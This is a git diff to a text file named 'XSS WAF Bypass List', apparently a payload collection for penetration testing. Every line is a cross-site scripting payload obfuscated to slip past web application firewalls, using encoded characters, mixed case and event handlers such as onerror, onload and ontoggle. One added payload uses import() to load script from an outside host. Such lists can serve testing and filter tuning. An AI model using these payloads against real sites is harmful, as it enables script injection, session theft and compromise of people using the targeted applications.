diff --git a/XSS WAF Bypass List.txt b/XSS WAF Bypass List.txt index 301c166..153edc9 100644 --- a/XSS WAF Bypass List.txt +++ b/XSS WAF Bypass List.txt @@ -44,10 +44,10 @@ confirm?.(1) '/*\'/*"/*\"/* - + ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> <img src='1' onerror='alert(0)' < -`<svg onload='1`'alert(0)'` +`<svg onload='1`'alert(0'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=alert(1)/**/(import(/https:\\X55.is?1=18369/.source))//>)'` %3cscript+%2f*%2500*%2f%3e%2f*%2500*%2falert(1)%2f*%2500*%2f%3c%2fscript+%2f*%2500*%2f "><body/oNpagEshoW=(confirm)(document.domain)> <<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` // @@ -82,3 +82,10 @@ confirm?.(1) ")%27--><SvG/onLoaD=(co&#110;firm)(1)--!>" ")%27--><SvG/onLoad=(confirm)(1)--!>" ")%27--><sVG/onload=(co&#110;firm)(1)<!--" +;1'"><!--><K Data-Spy=scroll Data-Target=&lt;Svg/OnLoad&equals;confirm?.(1)%26gt;%3E +;'"1<!--></Title/</Textarea/</Script/></Iframe><Details/Open/OnToggle=(confirm)(1)--> +;1/47/42/55/55/41/76/74Img/40Src/40OnError/75confirm/140/113/140/76 +;PDFLTlg8MQ== +<svG/x=">"/oNloaD=confirm()// +<svg onload=alert%26%230000000040"")> +%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%601%60%3E